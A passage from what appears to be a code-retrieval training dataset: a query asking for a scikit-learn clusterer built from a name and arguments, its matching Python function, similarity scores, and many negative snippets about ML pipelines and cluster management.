exported_pipeline.predict(testing_features)\n\"\"\"\n\n assert expected_code == export_pipeline(pipeline)", "def mockpipe_fmt(request, testdir):\n mp = testdir.makefile(\"\", pipeline=MOCK_PIPELINE_FMT)\n return mp", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n \"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def pipeline(self):\n\n transformers = []\n\n custom = self.CustomFeature()\n #transformers.append(('custom', custom))\n n_features = int(self.n_features/2)\n\n #kbest = SelectKBest(score_func=chi2, k=n_features)\n #transformers.append(('kbest', kbest))\n\n # pca = PCA(n_components=n_features, svd_solver='randomized', whiten=True)\n # transformers.append(('pca', pca))\n\n if self.definer.problem_type == 'classification':\n extraTC = SelectFromModel(ExtraTreesClassifier(criterion='entropy'))\n else:\n extraTC = SelectFromModel(ExtraTreesRegressor())\n\n transformers.append(('extraTC', extraTC))\n\n #scaler = StandardScaler()\n #transformers.append(('scaler', scaler))\n #binarizer = Binarizer()\n return FeatureUnion(transformers)", "def run(self, pipeline: pipeline_pb2.Pipeline) -> Optional[Any]:\n pass", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Directory\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Directory(_ctx)", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def from_pipeline(cls, pipeline, proba=None, repeat=None):\n if proba is None:\n if repeat is None:\n new_p = cls(pipeline=pipeline)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_proba() is None:\n new_p = cls(pipeline=pipeline, repeat=repeat)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, repeat=repeat)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_repeat() is None:\n new_p = cls(pipeline=pipeline, proba=proba)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, proba=proba)\n return new_p", "def __init__(self, pipeline, config=None):\n self.config = config\n self.pipeline = pipeline", "def test_pipeline_basic(mockpipe, testdir):\n test = testdir.makepyfile(TEST_OK)\n result = testdir.inline_run(\n \"-v\",\n f\"--base-pipeline-dir={test.dirname}\",\n test\n )\n passed, skipped, failed = result.listoutcomes()\n\n assert len(passed) == 1\n assert len(skipped) == 0\n assert len(failed) == 0", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def build_model():\n # Build ML pipeline using random forest classifier\n model = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier(\n n_estimators=100, min_samples_split=2)))\n ])\n\n return model", "def __rmul__(self, other):\n from sktime.clustering.compose import ClustererPipeline\n from sktime.transformations.base import BaseTransformer\n from sktime.transformations.compose import TransformerPipeline\n from sktime.transformations.series.adapt import TabularToSeriesAdaptor\n\n # behaviour is implemented only if other inherits from BaseTransformer\n # in that case, distinctions arise from whether self or other is a pipeline\n # todo: this can probably be simplified further with \"zero length\" pipelines\n if isinstance(other, BaseTransformer):\n # ClustererPipeline already has the dunder method defined\n if isinstance(self, ClustererPipeline):\n return other * self\n # if other is a TransformerPipeline but self is not, first unwrap it\n elif isinstance(other, TransformerPipeline):\n return ClustererPipeline(clusterer=self, transformers=other.steps)\n # if neither self nor other are a pipeline, construct a ClustererPipeline\n else:\n return ClustererPipeline(clusterer=self, transformers=[other])\n elif is_sklearn_transformer(other):\n return TabularToSeriesAdaptor(other) * self\n else:\n return NotImplemented", "def forward_transform(self):\n\n if self._pipeline:\n #return functools.reduce(lambda x, y: x | y, [step[1] for step in self._pipeline[: -1]])\n return functools.reduce(lambda x, y: x | y, [step.transform for step in self._pipeline[:-1]])\n else:\n return None", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-data_dir\", required=True, help=\"Directory containing original data set in requisite folder structure (small part or all data)\")\n parser.add_argument(\"-features_filename\", required=True, help=\"Features cloudpickle file that provides that pruning information\")\n parser.add_argument(\"-start_seed\", type=int, default=1284171779)\n parser.add_argument(\"-num_datasets\", type=int, default=20)\n parser.add_argument(\"-modes\", choices=[PREPROCESS, TRAIN, EVALUATE], nargs=\"+\", required=True)\n args = parser.parse_args()\n return pipeline(args)", "def m_pipe(val, *fns, **kwargs):\n kw = kwargs\n _val = val\n for fn in fns:\n _val = fn(_val, **kw)\n return _val", "def build_pipeline_steps(do_bigram_sent, do_unigram_sent, bigram_sent_file, unigram_sent_file):\n features = []\n #print(\"Adding ngram features : ngram_range 2\")\n text_pipeline = ('text_pipeline', Pipeline([('ngrams', CountVectorizer(\n stop_words=\"english\", ngram_range=(1, 2), preprocessor=str.split, tokenizer=lambda x:x))]))\n features.append(text_pipeline)\n if do_bigram_sent:\n #print(\"Add bigram sentiment scores\")\n bigram_sent_score_lookup = get_bigram_sentiments(bigram_sent_file)\n features.append((\"bigram sentiment score\", FunctionTransformer(\n score_document_bigrams, kw_args={'score_lookup': bigram_sent_score_lookup}, validate=False)))\n if do_unigram_sent:\n #print(\"Add unigram sentiment scores\")\n unigram_sent_score_lookup = get_unigram_sentiments(unigram_sent_file)\n features.append((\"unigram sentiment score\", FunctionTransformer(\n score_document, kw_args={'score_lookup': unigram_sent_score_lookup}, validate=False)))\n pipeline_steps = Pipeline([(\"features\", FeatureUnion(features))])\n return pipeline_steps", "def fit_predict_model(self, X_train, y_train, X_test, pipeline):\n\n pipeline.fit(X_train, y_train)\n y_pred = pipeline.predict(X_test)\n return y_pred", "def __call__(self, seq, mask=(True, False)):\n for transformer in self.transformers:\n seq = transformer(seq, mask)\n return seq" ]
[ "0.6571192", "0.6444065", "0.6408322", "0.60807306", "0.6047931", "0.5914984", "0.59031147", "0.58204484", "0.5804149", "0.5747107", "0.5725643", "0.5704614", "0.5703797", "0.56960964", "0.56624687", "0.56623226", "0.5654284", "0.562496", "0.5591383", "0.55484897", "0.5527152", "0.55214953", "0.5515504", "0.5454731", "0.5431739", "0.5416454", "0.5387037", "0.536923", "0.5362079", "0.5361307", "0.5358632", "0.5343977", "0.53311324", "0.5329383", "0.53095514", "0.5271863", "0.5270154", "0.5263647", "0.5252655", "0.5249022", "0.5224243", "0.5187806", "0.51836973", "0.5178973", "0.51744735", "0.51505464", "0.5144407", "0.51161736", "0.51148087", "0.5101865", "0.51011825", "0.5095515", "0.5095515", "0.5094477", "0.50904405", "0.5064834", "0.5062134", "0.5052815", "0.5047644", "0.5043843", "0.50388217", "0.5033778", "0.5031922", "0.5029716", "0.5024996", "0.50227326", "0.5012179", "0.5010708", "0.5001752", "0.49897128", "0.4987921", "0.49834302", "0.49708194", "0.4965992", "0.49579322", "0.49548346", "0.4951075", "0.49351716", "0.49124846", "0.49018064", "0.48930818", "0.4891037", "0.48898372", "0.48841867", "0.48637784", "0.48590323", "0.48188254", "0.48171616", "0.48041812", "0.47997808", "0.4789441", "0.47881207", "0.47881207", "0.4768369", "0.476378", "0.4757564", "0.4748435", "0.47393388", "0.47387958", "0.47334924" ]
0.83327645
0
Return a scikitlearn clusterer from name and args.
def get_clusterer(name, kwargs): if name == 'KMeans': from sklearn.cluster import KMeans return KMeans(**kwargs) if name == 'MiniBatchKMeans': from sklearn.cluster import MiniBatchKMeans return MiniBatchKMeans(**kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def show_cluster(name: str) -> Cluster:\n environment = EnvironmentProvider().environment\n return environment.clusters[name]", "def create_marker_cluster(name: str):\n return MarkerCluster(name=name)", "def launch_example_cluster_cmd(*args, **kwargs):\n return launch_example_cluster(*args, **kwargs)", "def cluster(args):\n\n # if not (args.coverage or args.index):\n # logging.error('Must specify a coverage file or contigs + reference index.')\n\n logging.info('Starting clustering process')\n perform_clustering(args)", "def parse_clustering(key, content):\n if inspect.isclass(key):\n cl = key(**content)\n key = cl.__class__.__name__.lower()\n\n elif 'auto' in (content.get('n_clusters', ''),\n content.get('preference', '')) \\\n and key.lower() != 'hierarchical':\n # Wrapper class that automatically detects the best number of clusters\n # via 10-Fold CV\n content.pop('n_clusters', '')\n content.pop('preference', '')\n\n kwargs = {'param_grid': [], 'n_jobs': -1,\n 'scoring': silhouette_score, 'cv': 10}\n\n if key.lower() == 'kmeans':\n content.setdefault('init', 'k-means++')\n content.setdefault('n_jobs', 1)\n kwargs['estimator'] = KMeans(**content)\n elif key.lower() == 'ap':\n kwargs['estimator'] = AffinityPropagation(**content)\n kwargs['affinity'] = kwargs['estimator'].affinity\n else:\n logging.error(\"n_clusters = 'auto' specified outside kmeans or \"\n \"ap. Trying to create GridSearchCV pipeline anyway \"\n \" ...\")\n cl = GridSearchCV(**kwargs)\n elif 'auto' in (content.get('n_clusters', ''),\n content.get('preference', '')) \\\n and key.lower() == 'hierarchical':\n # TODO implement this\n # from adenine.utils.extensions import AgglomerativeClustering\n cl = AgglomerativeClustering(**content)\n else:\n if key.lower() == 'kmeans':\n content.setdefault('n_jobs', -1)\n cl = KMeans(**content)\n elif key.lower() == 'ap':\n content.setdefault('preference', 1)\n cl = AffinityPropagation(**content)\n elif key.lower() == 'ms':\n cl = MeanShift(**content)\n elif key.lower() == 'spectral':\n cl = SpectralClustering(**content)\n elif key.lower() == 'hierarchical':\n cl = AgglomerativeClustering(**content)\n else:\n cl = DummyNone()\n return (key, cl, 'clustering')", "def get_one_cluster_by_name(ctx, cluster_name, project_name):\n project = ctx.obj.groups.byName[project_name].get().data\n cluster = ctx.obj.groups[project.id].clusters[cluster_name].get()\n pprint(cluster.data)", "def __init__(self, conn, args, data, split_type, num_clusters):\n\n self.conn = conn\n self.args = args\n self.data = data\n self.split_type = split_type\n\n self.pca_model = None\n self.cluster_model = None\n self.algorithm = args['cluster_algorithm']\n\n # http://scikit-learn.org/stable/auto_examples/cluster/plot_cluster_comparison.html\n hdbsc = hdbscan.HDBSCAN(min_cluster_size=10)\n affinity_propagation = cluster.AffinityPropagation()\n ms = cluster.MeanShift(bin_seeding=True)\n spectral = cluster.SpectralClustering(n_clusters=num_clusters, \n eigen_solver='arpack',\n affinity=\"nearest_neighbors\", \n random_state=self.args['seed'])\n ward = cluster.AgglomerativeClustering(n_clusters=num_clusters, \n linkage='ward')\n birch = cluster.Birch(n_clusters=num_clusters)\n two_means = cluster.MiniBatchKMeans(n_clusters=num_clusters,\n random_state=self.args['seed'])\n average_linkage = cluster.AgglomerativeClustering(linkage=\"average\", \n n_clusters=num_clusters)\n hdbsc = hdbscan.HDBSCAN(min_cluster_size=10)\n kmeans = cluster.KMeans(n_clusters=num_clusters, random_state=self.args['seed'])\n dbscan = cluster.DBSCAN()\n \n self.clustering_algorithms = {\n 'MiniBatchKMeans': two_means,\n 'AffinityPropagation': affinity_propagation,\n 'MeanShift': ms,\n 'SpectralClustering': spectral,\n 'Ward': ward,\n 'AgglomerativeClustering': average_linkage,\n 'DBSCAN': dbscan,\n 'Birch': birch,\n 'HDBSCAN': hdbsc,\n 'KMeans': kmeans\n }", "def get_cluster(self,cluster_name,project_id=''):\n print( f'>>>>>>{self.project_id}')\n if project_id == '':\n project_id = self.project_id\n return self.get('{}/groups/{}/clusters/{}'.format(ApiVersion.A1.value,project_id,cluster_name))", "def __str__(self):\n return \"Clustering\"", "def parse():\n intro = \"\"\"\\\n Use this script to bootstrap, join nodes within a Galera Cluster\n ----------------------------------------------------------------\n Avoid joining more than one node at once!\n \"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=lambda prog:\n argparse.RawDescriptionHelpFormatter(prog, max_help_position=29),\n description=textwrap.dedent(intro),\n epilog=\"Author: Massimiliano Adamo <maxadamo@gmail.com>\")\n parser.add_argument(\n '-cg', '--check-galera', help='check if all nodes are healthy',\n action='store_true', dest='Cluster(None, None).checkonly()',\n required=False)\n parser.add_argument(\n '-dr', '--dry-run', help='show SQL statements to run on this cluster',\n action='store_true', dest='Cluster(None, None).show_statements()',\n required=False)\n parser.add_argument(\n '-je', '--join-existing', help='join existing Cluster',\n action='store_true',\n dest='Cluster(\"existing\", \"existing\").joincluster()', required=False)\n parser.add_argument(\n '-be', '--bootstrap-existing', help='bootstrap existing Cluster',\n action='store_true', dest='Cluster(None, \"existing\").createcluster()',\n required=False)\n parser.add_argument(\n '-jn', '--join-new', help='join new Cluster', action='store_true',\n dest='Cluster(\"new\", \"new\").joincluster()', required=False)\n parser.add_argument(\n '-bn', '--bootstrap-new', action='store_true',\n help='bootstrap new Cluster',\n dest='Cluster(None, \"new\").createcluster()', required=False)\n parser.add_argument(\n '-f', '--force', action='store_true',\n help='force bootstrap new or join new Cluster', required=False)\n\n return parser.parse_args()", "def main():\n parser = argparse.ArgumentParser(description=\"Wrapper of the scikit-learn AgglomerativeClustering method. \", formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))\n parser.add_argument('--config', required=False, help='Configuration file')\n\n # Specific args of each building block\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('--input_dataset_path', required=True, help='Path to the input dataset. Accepted formats: csv.')\n required_args.add_argument('--output_results_path', required=True, help='Path to the clustered dataset. Accepted formats: csv.')\n parser.add_argument('--output_plot_path', required=False, help='Path to the clustering plot. Accepted formats: png.')\n\n args = parser.parse_args()\n args.config = args.config or \"{}\"\n properties = settings.ConfReader(config=args.config).get_prop_dic()\n\n # Specific call of each building block\n agglomerative_clustering(input_dataset_path=args.input_dataset_path,\n output_results_path=args.output_results_path,\n output_plot_path=args.output_plot_path,\n properties=properties)", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def __init__(__self__,\n resource_name: str,\n args: ClusterArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...", "def is_sklearn_clusterer(obj):\n return is_sklearn_estimator(obj) and sklearn_scitype(obj) == \"clusterer\"", "def createCluster(method, n_clust=3, min_samples=5):\n if method == 'SpectralClustering':\n clust = SpectralClustering(n_clusters=n_clust)\n clust.fit(PC)\n scat = plt.scatter(-100, -100, zorder=2)\n elif method == 'OPTICS':\n clust = OPTICS(min_samples=min_samples)\n clust.fit(PC)\n scat = plt.scatter(PC[clust.labels_ == -1, 0],\n PC[clust.labels_ == -1, 1], c='k')\n return clust, scat", "def kozakov2015(*args, **kwargs):\n clusters = []\n for sel in args:\n cluster = Cluster(\"\", sel, pm.get_coords(sel))\n clusters.append(cluster)\n\n ensemble = Kozakov2015Ensemble(clusters)\n print(\n textwrap.dedent(\n f\"\"\"\n {ensemble}\n Class {ensemble.klass}\n S {ensemble.strength}\n S0 {ensemble.strength0}\n CD {ensemble.max_center_to_center}\n MD {ensemble.max_dist}\n \"\"\"\n )\n )", "def __str__(self):\n return \"Cluster\"", "def generate_cluster_stack_name(job):\n return 'cluster-%s----%s' % (job.compute_resource.id, job.id)", "def _setup_test_cluster(self, return_cluster, name, create_args):\n stack_name = '{0}_stack'.format(name)\n templ, self.stack = self._setup_test_stack(stack_name, TEMPLATE)\n cluster_instance = cbd.CloudBigData('%s_name' % name,\n templ.resource_definitions(\n self.stack)['cbd_cluster'],\n self.stack)\n self._stubout_create(return_cluster)\n return cluster_instance", "def get_cluster(self) -> 'AioCluster':\n return AioCluster(self)", "def create_cluster(self, name, cluster_type, params, ssh_key, *args, **kwargs):\n raise NotImplementedError", "def create_cluster(module, switch_list):\n global CHANGED_FLAG\n output = ''\n new_cluster = False\n\n node1 = switch_list[0]\n node2 = switch_list[1]\n\n name = node1 + '-' + node2 + '-cluster'\n\n cli = pn_cli(module)\n cli += ' switch %s cluster-show format name no-show-headers ' % node1\n cluster_list = run_cli(module, cli)\n\n if cluster_list is not None:\n cluster_list = cluster_list.split()\n if name not in cluster_list:\n new_cluster = True\n\n if new_cluster or cluster_list is None:\n cli = pn_cli(module)\n cli += ' switch %s cluster-create name %s ' % (node1, name)\n cli += ' cluster-node-1 %s cluster-node-2 %s ' % (node1, node2)\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created cluster %s\\n' % (node1, name)\n\n return output", "def get_cluster_def():\n if settings.NO_OP:\n return None\n\n ensure_in_custer()\n\n cluster = os.getenv('POLYAXON_CLUSTER', None)\n try:\n return json.loads(cluster) if cluster else None\n except (ValueError, TypeError):\n print('Could get cluster definition, '\n 'please make sure this is running inside a polyaxon job.')\n return None", "def main():\n if sys.argv[1] == \"start\":\n start_cluster(sys.argv[2], sys.argv[3], int(sys.argv[4]),\n int(sys.argv[5]), sys.argv[6], sys.argv[7],\n int(sys.argv[8]))\n elif sys.argv[1] == \"stop\":\n stop_cluster()\n else:\n print 'Unknown Option'", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = ClusterArgs.__new__(ClusterArgs)\n\n __props__.__dict__[\"allocation_state\"] = None\n __props__.__dict__[\"allocation_state_transition_time\"] = None\n __props__.__dict__[\"creation_time\"] = None\n __props__.__dict__[\"current_node_count\"] = None\n __props__.__dict__[\"errors\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"node_setup\"] = None\n __props__.__dict__[\"node_state_counts\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"provisioning_state_transition_time\"] = None\n __props__.__dict__[\"scale_settings\"] = None\n __props__.__dict__[\"subnet\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"user_account_settings\"] = None\n __props__.__dict__[\"virtual_machine_configuration\"] = None\n __props__.__dict__[\"vm_priority\"] = None\n __props__.__dict__[\"vm_size\"] = None\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_id: Optional[pulumi.Input[str]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n size_gb: Optional[pulumi.Input[int]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Cluster':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = _ClusterState.__new__(_ClusterState)\n\n __props__.__dict__[\"cluster_id\"] = cluster_id\n __props__.__dict__[\"identity\"] = identity\n __props__.__dict__[\"location\"] = location\n __props__.__dict__[\"name\"] = name\n __props__.__dict__[\"resource_group_name\"] = resource_group_name\n __props__.__dict__[\"size_gb\"] = size_gb\n __props__.__dict__[\"tags\"] = tags\n return Cluster(resource_name, opts=opts, __props__=__props__)", "def _initialize_cluster(filename):\n\tstar_cluster = cluster.Cluster(filename)\n\tprint(\"\\nYour star cluster is being created ...\")\n\tstar_cluster.populate_celestials()\n\treturn star_cluster", "def main():\n rs = redshift(config_file=CONFIG_FILENAME)\n \n # check if cluster already available\n try:\n clust_avail = check_available(rs)\n except rs_client.exceptions.ClusterNotFoundFault:\n clust_avail = False\n\n # if cluster not available, create it\n if not clust_avail:\n create_cluster(rs) \n \n print(f'Cluster is available. Cluster information: \\n{rs.get_cluster_info()}')", "def launch_cluster(**overrides) -> dict:\n if os.path.isfile(META_FILE):\n raise FileExistsError(\"Cluster already exists!\")\n\n config = DEFAULT_CONFIG.copy()\n config.update(**overrides)\n\n sg = make_sg()\n config[\"Instances\"].update(AdditionalMasterSecurityGroups=[sg.id])\n emr = get_emr_client()\n\n response = emr.run_job_flow(**config)\n cluster_id = response[\"JobFlowId\"]\n master_addr = wait_init(cluster_id)\n\n meta = {\n \"MasterNodeAddr\": master_addr,\n \"ClusterId\": cluster_id,\n \"SGId\": sg.id\n }\n with open(META_FILE, \"w\") as f:\n json.dump(meta, f)\n\n print(\"INFO: Cluster Launched!\")\n return meta", "def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")", "def cluster_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_name\")", "def _Clustered(self):\n def cluster_func(symbol):\n name = symbol.full_name\n if not name or symbol.IsStringLiteral():\n # min_count=2 will ensure order is maintained while not being grouped.\n # \"&\" to distinguish from real symbol names, id() to ensure uniqueness.\n name = '&' + hex(id(symbol))\n elif name.startswith('*'):\n # \"symbol gap 3\" -> \"symbol gaps\"\n name = re.sub(r'\\s+\\d+( \\(.*\\))?$', 's', name)\n # Never cluster symbols that span multiple paths so that all groups return\n # non-None path information.\n diff_status = None\n if symbol.IsDelta():\n diff_status = symbol.diff_status\n if symbol.object_path or symbol.full_name.startswith('**'):\n return (symbol.object_path, name, diff_status)\n return (symbol.address, name, diff_status)\n\n # Use a custom factory to fill in name & template_name.\n def group_factory(token, symbols):\n full_name = token[1]\n sym = symbols[0]\n if token[1].startswith('*'):\n return self._CreateTransformed(symbols,\n full_name=full_name,\n template_name=full_name,\n name=full_name,\n section_name=sym.section_name)\n return self._CreateTransformed(symbols,\n full_name=full_name,\n template_name=sym.template_name,\n name=sym.name,\n section_name=sym.section_name)\n\n # A full second faster to cluster per-section. Plus, don't need create\n # (section_name, name) tuples in cluster_func.\n ret = []\n for section in self.GroupedByContainerAndSectionName():\n ret.extend(section.GroupedBy(\n cluster_func, min_count=2, group_factory=group_factory))\n\n return self._CreateTransformed(ret)", "def __init__(self, messageHandler, **kwargs):\n Segments.__init__(self, messageHandler, **kwargs)\n self.printTag = 'Clustered ROM'\n self._divisionClassifier = None # Classifier to cluster subdomain ROMs\n self._metricClassifiers = None # Metrics for clustering subdomain ROMs\n self._clusterInfo = {} # contains all the useful clustering results\n self._evaluationMode = 'truncated' # TODO make user option, whether returning full histories or truncated ones\n self._featureTemplate = '{target}|{metric}|{id}' # created feature ID template\n\n # check if ROM has methods to cluster on (errors out if not)\n if not self._templateROM.isClusterable():\n self.raiseAnError(NotImplementedError, 'Requested ROM \"{}\" does not yet have methods for clustering!'.format(self._romName))", "def initFromCLI(cls, name=None):\n ap = cls._makeArgumentParser()\n ns = ap.parse_args()\n instance = cls.initFromOptions(ns, name=name)\n return instance", "def find_cluster_type(self, name):\n raise NotImplementedError", "def get_cluster_index(function_name, dataset_name):\n X, y = data_loader.load_dataset(dataset_name)\n if function_name == 'davies_bouldin':\n return davies_bouldin(X, y), 'min'\n else:\n return xie_beni(X, y), 'min'", "def launch_cluster(params):\n logging.info('Launching cluster of size: {} and type: {}'.format(params.cluster_size, params.instance_type))\n subprocess.check_call(['cgcloud',\n 'create-cluster',\n '--leader-instance-type', 'm3.medium',\n '--instance-type', params.instance_type,\n '--share', params.shared_dir,\n '--num-workers', str(params.cluster_size),\n '-c', params.cluster_name,\n '--spot-bid', str(params.spot_price),\n '--leader-on-demand',\n '--ssh-opts',\n '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no',\n 'toil'])", "def cluster_start(args: Namespace, configuration: BareConfig):\n logging.basicConfig(level=logging.DEBUG,\n datefmt='%m-%d %H:%M')\n launch_orchestrator(args=args, conf=configuration)", "def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL", "def get_cluster(self, label):\n try:\n return self._clusters[label]\n except KeyError:\n return None", "def cluster_name(self):\n return self.name", "def create_cluster(ctx, project_name, cluster_name, instance_size_name):\n project = ctx.obj.groups.byName[project_name].get().data\n\n cluster_config = {\n 'name': cluster_name,\n 'clusterType': 'REPLICASET',\n 'providerSettings': {\n 'providerName': 'AWS',\n 'regionName': 'US_WEST_1',\n 'instanceSizeName': instance_size_name}}\n\n cluster = ctx.obj.groups[project.id].clusters.post(**cluster_config)\n pprint(cluster.data)", "def _create_cluster(self, server_instance):\n return Cluster([server_instance])", "def get_clustering_algorithm_class(cls):\n return {\n \"spectral\": SpectralClusteringAlgorithm,\n \"dbscan\": DBSCANAlgorithm,\n \"gromos\": GromosAlgorithm,\n \"kmedoids\": KMedoidsAlgorithm,\n \"random\": RandomClusteringAlgorithm,\n \"hierarchical\": 